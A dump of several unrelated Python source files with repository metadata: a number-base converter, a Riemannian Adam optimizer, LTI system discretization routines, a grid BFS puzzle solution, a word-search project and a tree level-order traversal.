# setdefault(); syntax: dict.setdefault(key1, default=None)
print('Current dict a1', a1)
print('New item', a1.setdefault('hulk', 'Unknown'))
print('Current dict a1', a1)
print('Another item', a1.setdefault('strange', 'unknow'))
print('Current dict a1', a1)
print('one more item', a1.setdefault('panther'))
print('Current dict a1', a1)
| UTF-8 | Python | false | false | 960 | py | 141 | dictMethods.py | 124 | 0.667708 | 0.633333 | 0 | 40 | 23 | 68 |
jerrysun21/python_cmd_line_convert | 4,174,708,235,071 | d095b65cbe1ac98b3e4801a99ab262552cf92454 | 965a65402cad98fcf60492e482c596ebbb30c308 | /cnvt.py | f5f316fff5a8df3b97c527a8c44e9ef8b37c4ce3 | []
| no_license | https://github.com/jerrysun21/python_cmd_line_convert | a410a97510933aace4644bcc5f02ea65ab1b1876 | b89cc9c1bb2f1b970cefd175e01138d9c1b5221e | refs/heads/master | 2020-05-30T20:11:56.345159 | 2012-11-20T16:29:52 | 2012-11-20T16:29:52 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python
import argparse
import sys
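# Example invocations (illustrative):
#   python cnvt.py hd ff   ->  OUT (dec): 255
#   python cnvt.py db 10   ->  OUT (bin): 0b1010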
def parseInput(in_type, in_num):
if (in_type == 'bh' or in_type == 'bd'):
try:
int(in_num, 2)
return True
except ValueError:
return False
elif (in_type == 'hb' or in_type == 'hd'):
try:
int(in_num, 16)
return True
except ValueError:
return False
    elif (in_type == 'dh' or in_type == 'db'):
        try:
            int(in_num, 10)
            return True
        except ValueError:
            return False
else:
return False
parser = argparse.ArgumentParser(description="Converts bin/hex/dec numbers, does not work for negatives or floats ")
parser.add_argument('direction',
metavar='type',
default='hd',
        help='Specifies the conversion method, decimal to binary (db), decimal to hex (dh), hex to bin (hb), hex to dec (hd), bin to dec (bd), bin to hex (bh)')
parser.add_argument('input',
metavar='input',
        type=str,
        help="Input number, must match the conversion-from base (don't need 0x for hex)")
args=parser.parse_args()
cnvt_type = args.direction
if (parseInput(cnvt_type, str(args.input))):
if (cnvt_type == 'bh'):
print 'IN (bin): ' + str(args.input)
print 'OUT (hex): ' + hex(int(str(args.input), 2))
elif (cnvt_type == 'bd'):
print 'IN (bin): ' + str(args.input)
        print 'OUT (dec): ' + str(int(str(args.input), 2))
elif (cnvt_type == 'dh'):
print 'IN (dec): ' + str(args.input)
        print 'OUT (hex): ' + hex(int(args.input))
elif (cnvt_type == 'db'):
print 'IN (dec): ' + str(args.input)
        print 'OUT (bin): ' + bin(int(args.input))
elif (cnvt_type == 'hd'):
print 'IN (hex): ' + str(args.input)
print 'OUT (dec): ' + str(int(str(args.input), 16))
elif (cnvt_type == 'hb'):
print 'IN (hex): ' + str(args.input)
        print 'OUT (bin): ' + bin(int(str(args.input), 16))
else:
sys.exit("Invalid conversion type") | UTF-8 | Python | false | false | 1,921 | py | 2 | cnvt.py | 1 | 0.559604 | 0.554919 | 0 | 59 | 31.576271 | 156 |
kekmodel/geoopt | 19,052,474,926,064 | 2ca0e9a2eea6b1e81225d7319c49d47bbea7a6df | 0b0c6885f40219689ce4b1859248612db00b9795 | /geoopt/optim/radam.py | 6c90b16a4ccc18df1d596394fc444aef0295b5ca | [
"Apache-2.0"
]
| permissive | https://github.com/kekmodel/geoopt | bb2a060cc28784a3a051e71d953313cd65e43d7a | 7f4f54ca44f175f47030965ef2fdaae92eb59f8b | refs/heads/master | 2020-04-17T10:33:37.117862 | 2019-01-18T11:38:36 | 2019-01-18T11:38:36 | 166,505,241 | 1 | 0 | null | true | 2019-01-19T04:18:00 | 2019-01-19T04:18:00 | 2019-01-18T11:38:39 | 2019-01-18T11:40:44 | 85 | 0 | 0 | 0 | null | false | null | import torch.optim
from .mixin import OptimMixin
from .tracing import create_traced_update
from ..tensor import ManifoldParameter, ManifoldTensor
from ..manifolds import Euclidean
class RiemannianAdam(OptimMixin, torch.optim.Adam):
r"""Riemannian Adam with the same API as :class:`torch.optim.Adam`
Parameters
----------
params : iterable
iterable of parameters to optimize or dicts defining
parameter groups
lr : float (optional)
learning rate (default: 1e-3)
betas : Tuple[float, float] (optional)
coefficients used for computing
running averages of gradient and its square (default: (0.9, 0.999))
eps : float (optional)
term added to the denominator to improve
numerical stability (default: 1e-8)
weight_decay : float (optional)
weight decay (L2 penalty) (default: 0)
amsgrad : bool (optional)
whether to use the AMSGrad variant of this
algorithm from the paper `On the Convergence of Adam and Beyond`_
(default: False)
Other Parameters
----------------
stabilize : int
Stabilize parameters if they are off-manifold due to numerical
reasons every ``stabilize`` steps (default: ``None`` -- no stabilize)
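    Examples
    --------
    Minimal usage sketch (hypothetical tensors and manifold; the optimizer
    is a drop-in replacement for :class:`torch.optim.Adam`)::

        param = ManifoldParameter(data, manifold=manifold)
        optim = RiemannianAdam([param], lr=1e-3, stabilize=10)
        loss_fn(param).backward()
        optim.step()
        optim.zero_grad()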
.. _On the Convergence of Adam and Beyond:
https://openreview.net/forum?id=ryQu7f-RZ
"""
def step(self, closure=None):
"""Performs a single optimization step.
Arguments
---------
closure : callable (optional)
A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
with torch.no_grad():
for group in self.param_groups:
if "step" not in group:
group["step"] = 0
betas = self.group_param_tensor(group, "betas")
weight_decay = self.group_param_tensor(group, "weight_decay")
eps = self.group_param_tensor(group, "eps")
learning_rate = self.group_param_tensor(group, "lr")
amsgrad = group["amsgrad"]
for p in group["params"]:
if p.grad is None:
continue
if isinstance(p, (ManifoldParameter, ManifoldTensor)):
manifold = p.manifold
else:
manifold = Euclidean()
if p.grad.is_sparse:
raise RuntimeError(
"Adam does not support sparse gradients, please consider SparseAdam instead"
)
state = self.state[p]
# State initialization
if len(state) == 0:
state["step"] = torch.tensor(0)
# Exponential moving average of gradient values
state["exp_avg"] = torch.zeros_like(p)
# Exponential moving average of squared gradient values
inner_prod_shape = p.shape
if manifold.ndim > 0:
inner_prod_shape = inner_prod_shape[: -manifold.ndim]
state["exp_avg_sq"] = torch.zeros(
inner_prod_shape, dtype=p.dtype, device=p.device
)
if amsgrad:
# Maintains max of all exp. moving avg. of sq. grad. values
state["max_exp_avg_sq"] = torch.zeros(
inner_prod_shape, dtype=p.dtype, device=p.device
)
# this is assumed to be already transported
if "traced_step" not in state:
if amsgrad:
state["traced_step"] = create_traced_update(
self.perform_step,
manifold,
p,
weight_decay.type_as(p),
betas.type_as(p),
eps.type_as(p),
state["step"],
state["exp_avg"],
state["exp_avg_sq"],
state["max_exp_avg_sq"],
amsgrad=True,
)
else:
state["traced_step"] = create_traced_update(
self.perform_step,
manifold,
p,
weight_decay.type_as(p),
betas.type_as(p),
eps.type_as(p),
state["step"],
state["exp_avg"],
state["exp_avg_sq"],
max_exp_avg_sq=None,
amsgrad=False,
)
if amsgrad:
state["traced_step"](
p,
p.grad,
learning_rate.type_as(p),
weight_decay.type_as(p),
betas.type_as(p),
eps.type_as(p),
state["step"],
state["exp_avg"],
state["exp_avg_sq"],
state["max_exp_avg_sq"],
)
else:
state["traced_step"](
p,
p.grad,
learning_rate.type_as(p),
weight_decay.type_as(p),
betas.type_as(p),
eps.type_as(p),
state["step"],
state["exp_avg"],
state["exp_avg_sq"],
)
group["step"] += 1
if self._stabilize is not None and group["step"] % self._stabilize == 0:
self.stabilize_group(group)
return loss
@staticmethod
def perform_step(
manifold,
point,
grad,
lr,
weight_decay,
betas,
eps,
step,
exp_avg,
exp_avg_sq,
max_exp_avg_sq,
amsgrad,
):
grad.add_(weight_decay, point)
grad = manifold.proju(point, grad)
exp_avg.mul_(betas[0]).add_(1 - betas[0], grad)
exp_avg_sq.mul_(betas[1]).add_(1 - betas[1], manifold.inner(point, grad))
if amsgrad:
# Maintains the maximum of all 2nd moment running avg. till now
torch.max(max_exp_avg_sq, exp_avg_sq, out=max_exp_avg_sq)
# Use the max. for normalizing running avg. of gradient
denom = max_exp_avg_sq.sqrt().add_(eps)
else:
denom = exp_avg_sq.sqrt().add_(eps)
denom = manifold.broadcast_scalar(denom)
step.add_(1)
bias_correction1 = 1 - betas[0] ** step.type_as(betas)
bias_correction2 = 1 - betas[1] ** step.type_as(betas)
step_size = lr * bias_correction2.sqrt_().div_(bias_correction1)
        # tangent-space update direction (first moment scaled by the
        # adaptive denominator); the retraction below steps along its negative
direction = exp_avg / denom
# transport the exponential averaging to the new point
new_point, exp_avg_new = manifold.retr_transp(
point, direction, -step_size, exp_avg
)
point.set_(new_point)
exp_avg.set_(exp_avg_new)
def stabilize_group(self, group):
with torch.no_grad():
for p in group["params"]:
if not isinstance(p, (ManifoldParameter, ManifoldTensor)):
continue
state = self.state[p]
manifold = p.manifold
exp_avg = state["exp_avg"]
p.set_(manifold.projx(p))
exp_avg.set_(manifold.proju(p, exp_avg))
def _sanitize_group(self, group):
group = group.copy()
if isinstance(group["lr"], torch.Tensor):
group["lr"] = group["lr"].item()
if isinstance(group["weight_decay"], torch.Tensor):
group["weight_decay"] = group["weight_decay"].item()
if isinstance(group["eps"], torch.Tensor):
group["eps"] = group["eps"].item()
if isinstance(group["betas"], torch.Tensor):
group["betas"] = group["betas"][0].item(), group["betas"][1].item()
return group
| UTF-8 | Python | false | false | 8,871 | py | 18 | radam.py | 13 | 0.451697 | 0.447526 | 0 | 222 | 38.959459 | 104 |
Jonas-Nicodemus/phdmd | 9,328,669,010,422 | c8138715d8c03daff0b6d903ee64975bc2c17db8 | 2f3c413ff9678ddc4aff0fb182c402c4466723ea | /src/discretization/discretization.py | c510f58af109632c0a96d60dde89be049c55c035 | [
"MIT"
]
| permissive | https://github.com/Jonas-Nicodemus/phdmd | 208b43ad3500713fdfe1b1244d891cf2c4b83672 | 6b72e840cd71fb22422a01c5550225996bcd1eff | refs/heads/main | 2023-04-14T06:42:32.177808 | 2023-02-10T14:52:53 | 2023-02-10T14:52:53 | 483,152,686 | 4 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import numpy as np
from tqdm import tqdm
from pymor.algorithms.to_matrix import to_matrix
from pymor.models.iosys import LTIModel, PHLTIModel
def discretize(lti, U, T, x0, method='implicit_midpoint', return_dXdt=False):
"""
Discretize a continuous-time linear time-invariant system.
Parameters
----------
lti : pymor.models.iosys.PHLTIModel
The LTI system to discretize.
U : np.ndarray or callable
The input signal. If callable, it must take a single argument T and
return a 2D array of shape (dim_input, len(T)).
T : np.ndarray
The time instants at which to compute the data.
x0 : np.ndarray
The initial state.
method : str
The method to use for the discretization. Available methods are:
'implicit_midpoint', 'explicit_euler', 'explicit_midpoint', 'scipy_solve_ivp'.
return_dXdt : bool
Whether to return the time derivative of the state.
Returns
-------
U : np.ndarray
The input signal.
X : np.ndarray
The state data.
Y : np.ndarray
The output data.
"""
assert isinstance(lti, PHLTIModel) or isinstance(lti, LTIModel)
if isinstance(lti, PHLTIModel):
lti = lti.to_lti()
match method:
case 'implicit_midpoint':
return implicit_midpoint(lti, U, T, x0, return_dXdt)
case 'explicit_euler':
return explicit_euler(lti, U, T, x0, return_dXdt)
case 'explicit_midpoint':
return explicit_midpoint(lti, U, T, x0, return_dXdt)
case _:
return scipy_solve_ivp(lti, U, T, x0, method, return_dXdt)
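# Usage sketch (hypothetical model and input signal; shapes as documented):
#   T = np.linspace(0., 4., 101)
#   u = lambda t: np.ones((1, len(t)))
#   U, X, Y = discretize(lti, u, T, x0=np.zeros(lti.order))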
def implicit_midpoint(lti, U, T, x0, return_dXdt=False):
"""
Discretize a continuous-time linear time-invariant system using the implicit midpoint method.
Parameters
----------
lti : pymor.models.iosys.LTIModel
The LTI system to discretize.
U : np.ndarray or callable
The input signal. If callable, it must take a single argument T and
return a 2D array of shape (dim_input, len(T)).
T : np.ndarray
The time instants at which to compute the data.
x0 : np.ndarray
The initial state.
return_dXdt : bool
Whether to return the time derivative of the state.
Returns
-------
U : np.ndarray
The input signal.
X : np.ndarray
The state data.
Y : np.ndarray
The output data.
"""
    if not isinstance(U, np.ndarray):
        U = U(T)
    if U.ndim < 2:
        U = U[np.newaxis, :]
delta = T[1] - T[0]
M = to_matrix(lti.E - delta / 2 * lti.A)
AA = to_matrix(lti.E + delta / 2 * lti.A)
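    # Implicit midpoint rule:
    #   (E - dt/2 * A) x_{k+1} = (E + dt/2 * A) x_k + dt * B u_{k+1/2}
    # with M = E - dt/2*A and AA = E + dt/2*A assembled once above.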
E = to_matrix(lti.E, format='dense')
A = to_matrix(lti.A)
B = to_matrix(lti.B)
C = to_matrix(lti.C)
D = to_matrix(lti.D, format='dense')
X = np.zeros((lti.order, len(T)))
X[:, 0] = x0
for i in tqdm(range(len(T) - 1)):
U_midpoint = 1 / 2 * (U[:, i] + U[:, i + 1])
X[:, i + 1] = np.linalg.solve(M, AA @ X[:, i] + delta * B @ U_midpoint)
Y = C @ X + D @ U
if not return_dXdt:
return U, X, Y
else:
dXdt = np.linalg.solve(E, A @ X + B @ U)
return U, X, Y, dXdt
def explicit_euler(lti, U, T, x0, return_dXdt=False):
"""
Discretize a continuous-time linear time-invariant system using the explicit Euler method.
Parameters
----------
lti : pymor.models.iosys.LTIModel
The LTI system to discretize.
U : np.ndarray or callable
The input signal. If callable, it must take a single argument T and
return a 2D array of shape (dim_input, len(T)).
T : np.ndarray
The time instants at which to compute the data.
x0 : np.ndarray
The initial state.
return_dXdt : bool
Whether to return the time derivative of the state.
Returns
-------
U : np.ndarray
The input signal.
X : np.ndarray
The state data.
Y : np.ndarray
The output data.
"""
if not isinstance(U, np.ndarray):
U = U(T)
if U.ndim < 2:
U = U[np.newaxis, :]
delta = T[1] - T[0]
E = to_matrix(lti.E, format='dense')
A = to_matrix(lti.A)
B = to_matrix(lti.B)
C = to_matrix(lti.C)
D = to_matrix(lti.D, format='dense')
X = np.zeros((lti.order, len(T)))
X[:, 0] = x0
for i in tqdm(range(len(T) - 1)):
X[:, i + 1] = X[:, i] + delta * np.linalg.solve(E, A @ X[:, i] + B @ U[:, i])
Y = C @ X + D @ U
if not return_dXdt:
return U, X, Y
else:
dXdt = np.linalg.solve(E, A @ X + B @ U)
return U, X, Y, dXdt
def explicit_midpoint(lti, U, T, x0, return_dXdt=False):
"""
Discretize a continuous-time linear time-invariant system using the explicit midpoint method.
Parameters
----------
lti : pymor.models.iosys.LTIModel
The LTI system to discretize.
U : np.ndarray or callable
The input signal. If callable, it must take a single argument T and
return a 2D array of shape (dim_input, len(T)).
T : np.ndarray
The time instants at which to compute the data.
x0 : np.ndarray
The initial state.
return_dXdt : bool
Whether to return the time derivative of the state.
Returns
-------
U : np.ndarray
The input signal.
X : np.ndarray
The state data.
Y : np.ndarray
The output data.
"""
if not isinstance(U, np.ndarray):
U = U(T)
if U.ndim < 2:
U = U[np.newaxis, :]
delta = T[1] - T[0]
E = to_matrix(lti.E, format='dense')
A = to_matrix(lti.A)
B = to_matrix(lti.B)
C = to_matrix(lti.C)
D = to_matrix(lti.D, format='dense')
X = np.zeros((lti.order, len(T)))
X[:, 0] = x0
for i in tqdm(range(len(T) - 1)):
X_ = X[:, i] + delta * np.linalg.solve(E, A @ X[:, i] + B @ U[:, i])
X[:, i + 1] = X[:, i] + delta * np.linalg.solve(E, A @ X_ + B @ (1 / 2 * (U[:, i] + U[:, i + 1])))
Y = C @ X + D @ U
if not return_dXdt:
return U, X, Y
else:
dXdt = np.linalg.solve(E, A @ X + B @ U)
return U, X, Y, dXdt
def scipy_solve_ivp(lti, u, T, x0, method='RK45', return_dXdt=False):
E = to_matrix(lti.E, format='dense')
A = to_matrix(lti.A)
B = to_matrix(lti.B)
C = to_matrix(lti.C)
D = to_matrix(lti.D, format='dense')
U = u(T)
if U.ndim < 2:
U = U[np.newaxis, :]
from scipy.integrate import solve_ivp
def f(t, x, u):
return np.linalg.solve(E, A @ x + B @ u(t))
sol = solve_ivp(f, (T[0], T[-1]), x0, t_eval=T, method=method, args=(u,))
X = sol.y
Y = C @ X + D @ U
if not return_dXdt:
return U, X, Y
else:
dXdt = np.linalg.solve(E, A @ X + B @ U)
return U, X, Y, dXdt
| UTF-8 | Python | false | false | 6,847 | py | 31 | discretization.py | 18 | 0.555426 | 0.547831 | 0 | 247 | 26.720648 | 106 |
Sunghwan-DS/TIL | 7,705,171,360,963 | 4855cc702d440850fe157a192dd77f52e2cbc25a | 8051c8863119bc2b5e5b3107ce9c47ab12616e63 | /Python/BOJ/BOJ_17142.py | 9989d49b27554e20dc7966a0856536b0987a92e0 | []
| no_license | https://github.com/Sunghwan-DS/TIL | c01f6f4c84f3e2d85e16893bbe95c7f1b6270c77 | 6d29f6451f9b17bc0acc67de0e520f912dd0fa74 | refs/heads/master | 2021-07-11T16:23:58.077011 | 2021-03-12T02:28:26 | 2021-03-12T02:28:26 | 234,990,431 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # 2020.03.21
# 22:00 ~ 22:32
# BFS implementation
# Runtime: 1004 ms, code length: 1810 B
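# Approach: among the virus candidates (grid value 2) try every subset of
# size M (make_virus), BFS from all chosen cells simultaneously, and keep
# the earliest minute at which every empty cell (value 0) is infected;
# unchosen (inactive) viruses are passable and need no infection time.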
def BFS(virus):
global ans
visited = [[False] * N for _ in range(N)]
q = virus[:]
for y, x in q:
visited[y][x] = True
    final_cnt = 2500  # sentinel larger than any possible spread time (N <= 50)
res = 0
cnt = 0
stop = False
while q:
cnt += 1
for _ in range(len(q)):
y, x = q.pop(0)
for dir in range(4):
ny = y + dy[dir]
nx = x + dx[dir]
if 0 <= ny <= N-1 and 0 <= nx <= N-1 and not visited[ny][nx] and arr[ny][nx] != 1:
q.append((ny, nx))
visited[ny][nx] = True
if arr[ny][nx] == 0:
res += 1
if res == need:
final_cnt = cnt
stop = True
break
if stop:
break
if stop:
break
stop = False
for i in range(N):
for j in range(N):
if not visited[i][j] and arr[i][j] == 0:
stop = True
break
if stop:
break
else:
ans = min(ans, final_cnt)
def make_virus(idx, virus):
if len(virus) == M:
BFS(virus)
return
if idx == len(virus_co):
return
virus.append(virus_co[idx])
make_virus(idx + 1, virus)
virus.pop()
make_virus(idx + 1, virus)
dy = [-1, 0, 1, 0]
dx = [0, 1, 0, -1]
N, M = map(int,input().split())
arr = [list(map(int,input().split())) for _ in range(N)]
need = 0
virus_co = []
for i in range(N):
for j in range(N):
if arr[i][j] == 2:
virus_co.append((i, j))
elif arr[i][j] == 0:
need += 1
if need == 0:
print(0)
exit()
ans = 2500
make_virus(0, [])
if ans == 2500:
print(-1)
else:
print(ans) | UTF-8 | Python | false | false | 1,890 | py | 305 | BOJ_17142.py | 286 | 0.409819 | 0.374066 | 0 | 90 | 19.833333 | 98 |
roshni-v/cpe101-word-finder-project | 6,485,400,636,445 | bec23084515dab9e3420d461771c9a23541724a9 | 0d45c828de90ae0b18af396021efa2270af3aacf | /wordFinderFuncs.py | 39075fecd97870d9619ea928c33b1fe57633a6fa | []
| no_license | https://github.com/roshni-v/cpe101-word-finder-project | ff2cb8f9cb60aece1c3730fc94b7f050f4cedfbc | 112c3c4646bf42a37a9b3ce4b87f9910209a16c7 | refs/heads/main | 2023-04-24T19:39:40.255653 | 2021-05-07T10:59:07 | 2021-05-07T10:59:07 | 365,204,252 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Project 3 Word Finder
#
# Name: Roshni Vakil
# Instructor: Dr. S. Einakian
# Section: 9/10
#creates a point object from two provided coordinates
#int + int --> Point
class Point:
def __init__(self, row, column):
self.__row = row
self.__column = column
def __repr__(self):
return "row: " + str(self.__row) + " column: " + str(self.__column)
def getRow(self):
return self.__row
def getColumn(self):
return self.__column
def setRow(self, value):
self.__row = value
def setColumn(self, value):
self.__column = value
#purpose: gets input for puzzle
#None --> list
def getPuzzleList():
longPuzzle = input()
rows, cols = (10, 10)
puzzle = []
for i in range(cols):
col = []
puzzle.append(col)
for j in range(rows):
col.append(longPuzzle[10*i+j])
return(puzzle)
#purpose: gets input for puzzle
#None --> list
#def getPuzzle():
#1) asks the user for input for puzzle
#2) stores it in a 100 character string
#3) creates a new empty 2D list
#4) takes the first 10 characters from the 100 character string, and adds it to a string representing line 1
#5) adds that string to the 2D list
    #6) repeat steps 4-5 for every following set of 10 characters in the 100 character string
    #7) return that 2D list
#purpose: prints the puzzle grid
#list --> None
def printPuzzleString(twoDList: list):
print("Puzzle: \n")
    for row in range(len(twoDList)):
        for letter in twoDList[row]:
            print(letter, end = "")
        print()
#purpose: gets an input list for words we are searching for
#None --> list
def getWords():
words = input()
listOfWords = words.split()
return listOfWords
#purpose: gets an input list for words we are searching for
#None --> list
#def getWords():
#1) create an empty place (list) to store the words that we are going to search for
#2) asks the user if they have a word they are searching for
#2.1) if the answer is no, give option to end program
#2.2) if yes, ask again
#3) add this to the empty list of words we are searching for
    #4) asks the user if they have any other words they are looking for
#4.1) if the answer is yes, add this to the empty list of values we are searching for and repeat step 4
#4.2) if no, return this list
#purpose: checks for given word spelled forward
#list + String --> Point
def forward_and_basis_for_other_functions(puzzleList: list, word: str):
    for i in range(len(puzzleList)):
        count = 0
        for j in range(len(puzzleList[0])):
            if puzzleList[i][j].lower() == word[count].lower():
                if count == 0:
                    returnVal = Point(i, j)
                count += 1
                if count == len(word):
                    # full word matched: return its starting coordinates
                    return returnVal
            elif count > 0:
                # mismatch mid-word: reset, letting the current character
                # start a new match attempt
                count = 0
                if puzzleList[i][j].lower() == word[0].lower():
                    returnVal = Point(i, j)
                    count = 1
    return "N"
#purpose: checks for given word spelled forward
#list + String --> Point
#def forward(list, word):
#1) get the length of the given word
#2) while the word is not found, do the following:
#2.1) go through each character in each line incrementally until we reach the index where the word is no longer possible in that line
#2.1.1)if the current character matches the current character of the given word (character that starts at 0 and increments):
#2.1.1.1) store start location (point object)
#2.1.1.2) move to the next character in both the puzzle and the given word
#2.1.1.3) repeat step 2.1.1 without re-storing start location
#2.1.1.3.1) if at any point the word is found return start location
            # 2.1.2) if not, repeat all of step 2.1 with current character in puzzle if had gone through at least one iteration of 2.1.1.
# 2.1.3) else, move one unit forward in the puzzle line and repeat 2.1
#2.2) move to next line and repeat all of 2.1
#2.3) if we finish without finding the word return None location
#purpose: checks for given word spelled backward
#list + String --> Point
def backward(puzzleList: list, word: str):
backwardList = []
for i in range(len(puzzleList)):
backwardList.append([])
for j in range(len(puzzleList[i]) - 1, -1, -1):
backwardList[i].append(puzzleList[i][j])
temp = forward_and_basis_for_other_functions(backwardList, word)
if temp != "N":
temp.setColumn(9 - temp.getColumn())
return temp
#purpose: checks for given word spelled backward
#list + String --> Point
#def backward(list, word):
#1) get the length of the given word
#2) while the word is not found do the following:
#2.1) go through each character in each line incrementally until we reach the index where the word is no longer possible in that line
#2.1.1) if the current character matches the current character of the given word (character that starts at length - 1 and then decrements):
#2.1.1.1) store start location (point object)
#2.1.1.2) move to the next character in both the puzzle and the given word
#2.1.1.3) repeat step 2.1.1 without restoring start location
#2.1.1.3.1) if at any point the word is found return start location
            #2.1.2) if not, repeat all of step 2.1 with current character in puzzle if had gone through at least one iteration of 2.1.1.
#2.1.3) else, move one unit forward in the puzzle line and repeat 2.1
#2.2) move to next line and repeat all of 2.1
#2.3) if we finish without finding the word return None location
#purpose: checks for given word spelled upward
#list + String --> Point
def upward(puzzleList: list, word: str):
upwardList = []
for i in range(len(puzzleList[0])):
upwardList.append([])
for j in range(len(puzzleList) - 1, -1, -1):
upwardList[i].append(puzzleList[j][i])
temp = forward_and_basis_for_other_functions(upwardList, word)
if temp != "N":
newRow = temp.getColumn()
temp.setColumn(temp.getRow())
temp.setRow(abs(9-newRow))
return temp
#purpose: checks for given word spelled upward
#list + String --> Point
#def upward(list, word):
#1) get the length of the given word
#2) while the word is not found do the following:
#2.1) go through each character at a given index value for each string of 10 letters (start at the 0th index, then 1st, etc) where it is possible that the word could be found below
            #2.1.1) if the current character matches the current character of the given word (character that starts at length - 1 and then decrements):
#2.1.1.1) store start location (point object)
#2.1.1.2) move to the next character in both the puzzle and the given word
#2.1.1.3) repeat step 2.1.1 without restoring start location
#2.1.1.3.1) if at any point the word is found return start location
            #2.1.2) if not, repeat all of step 2.1 with current character in puzzle if had gone through at least one iteration of 2.1.1.
#2.1.3) else, move one unit to the next line in the puzzle and repeat 2.1
#2.2) move to next index value and repeat all of 2.1
#2.3) if we finish without finding the word return None location
#purpose: checks for given word spelled downward
#list + String --> Point
def downward(puzzleList: list, word: str):
downwardList = []
for i in range(len(puzzleList[0])):
downwardList.append([])
for j in range(len(puzzleList)):
downwardList[i].append(puzzleList[j][i])
temp = forward_and_basis_for_other_functions(downwardList, word)
if temp != "N":
newRow = temp.getColumn()
temp.setColumn(temp.getRow())
temp.setRow(newRow)
return temp
#purpose: checks for given word spelled downward
#list + String --> Point
#def downward(list, word):
#1) get the length of the given word
#2) while the word is not found do the following:
#2.1) go through each character at a given index value for each string of 10 letters (start at the 0th index, then 1st, etc) where it is possible that the word could be found below
#2.1.1) if the current character matches the currrent character of the given word (starts at 0 and increments):
#2.1.1.1) store start location (point object)
#2.1.1.2) move to the next character in both the puzzle and the given word
#2.1.1.3) repeat step 2.1.1 without restoring start location
#2.1.1.3.1) if at any point the word is found return start location
#2.1.2) if not, repeat all of step 2.1 with current character in puzzle if had gone through at least one interation of 2.1.1.
#2.1.3) else, move one unit to the next line in the puzzle and repeat 2.1
#2.2) move to next index value and repeat all of 2.1
#2.3) if we finish without finding the word return None location
#purpose: checks for given word spelled diagonally
#list + String --> Point
def diagonally(puzzleList: list, word: str):
diagonalList = []
diagonalList.append([])
for i in range(len(puzzleList)):
for j in range(len(puzzleList[i])):
if i == j:
diagonalList[0].append(puzzleList[i][j])
temp = forward_and_basis_for_other_functions(diagonalList, word)
if temp != "N":
temp.setRow(temp.getColumn())
else:
temp = backward(diagonalList, word)
if temp != "N":
temp.setRow(temp.getColumn())
return temp
#purpose: checks for given word spelled diagonally
#list + String --> Point
#def diagonally(list, word):
#1) get the length of the given word
#2) while the word is not found do the following:
#2.1) go through each character in each line incrementally until we reach the index where the word is no longer possible diagonally (not enough characters left to the right)
#2.1.1) if the current character matches the current character of the given word (starts at 0 and increments):
#2.1.1.1) store start location (point object)
#2.1.1.2) move to the next character in the given word and the next character on the next line in the puzzle (move one unit down diagonally)
#2.1.1.3) repeat step 2.1.1 without restoring start location
#2.1.1.3.1) if at any point the word is found return start location
#2.1.2) if not, repeat all of step 2.1 with the character 1 unit to the right of the location value
#7.2.2) move to next line and repeat all of 2.1
#7.2.3) if we finish without finding the word return None location
| UTF-8 | Python | false | false | 11,361 | py | 2 | wordFinderFuncs.py | 2 | 0.621072 | 0.59405 | 0 | 250 | 44.436 | 190 |
groundnuty/lw-daap | 9,174,050,187,945 | afd48d9a51e2f0622c9d037fde86df63362e5352 | b9cd85504a84ef99f7c96784ab0fc67fb1921c3f | /lw_daap/modules/deposit/validation_utils.py | 77d8aa7bd67c698115298625ce8d9cc939d5bc36 | []
| no_license | https://github.com/groundnuty/lw-daap | 28bed75257e60c51e3bde47385ad95efdc59e52b | e84cb33310506fcdab1dcdb1e8bd425d44435fbe | refs/heads/master | 2021-01-11T00:35:48.649454 | 2016-10-11T20:52:42 | 2016-10-11T20:52:42 | 70,513,173 | 0 | 0 | null | true | 2016-10-10T17:42:45 | 2016-10-10T17:42:44 | 2016-01-21T20:26:25 | 2016-07-08T12:22:19 | 6,433 | 0 | 0 | 0 | null | null | null | # -*- coding: utf-8 -*-
#
# This file is part of Lifewatch DAAP.
# Copyright (C) 2015 Ana Yaiza Rodriguez Marrero.
#
# Lifewatch DAAP is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Lifewatch DAAP is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Lifewatch DAAP. If not, see <http://www.gnu.org/licenses/>.
"""Validation functions."""
from wtforms_components import DateRange
class StartEndDate(DateRange):
"""Require start date before end date."""
def __init__(self, min_from=None, max_from=None, **kwargs):
super(StartEndDate, self).__init__(**kwargs)
self.min_from = min_from
self.max_from = max_from
def __call__(self, form, field):
if self.min_from:
self.min = getattr(form, self.min_from).data
if self.max_from:
self.max = getattr(form, self.max_from).data
super(StartEndDate, self).__call__(form, field)
| UTF-8 | Python | false | false | 1,349 | py | 228 | validation_utils.py | 115 | 0.690141 | 0.685693 | 0 | 37 | 35.459459 | 72 |
FluffyFu/Leetcode | 12,902,081,794,360 | 0d0eaff62bb314f73da77019bfdcc154228b6455 | 538fd58e4f7d0d094fd6c93ba1d23f78a781c270 | /102_binary_tree_level_order_traversal/solution.py | 0914b40ee7bb5251e602984ccb4b757ffab0c459 | []
| no_license | https://github.com/FluffyFu/Leetcode | 4633e9e91e493dfc01785fd379ab9f0788726ac1 | 5625e6396b746255f3343253c75447ead95879c7 | refs/heads/master | 2023-03-21T08:47:51.863360 | 2021-03-06T21:36:43 | 2021-03-06T21:36:43 | 295,880,151 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from typing import List
from queue import Queue
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution:
def levelOrder(self, root: TreeNode) -> List[List[int]]:
result = []
if not root:
return result
q = Queue()
q.put(root)
while not q.empty():
level_len = q.qsize()
level_res = []
for _ in range(level_len):
node = q.get()
if node.left:
q.put(node.left)
if node.right:
q.put(node.right)
level_res.append(node.val)
result.append(level_res)
return result
| UTF-8 | Python | false | false | 784 | py | 475 | solution.py | 474 | 0.479592 | 0.478316 | 0 | 34 | 22.029412 | 60 |
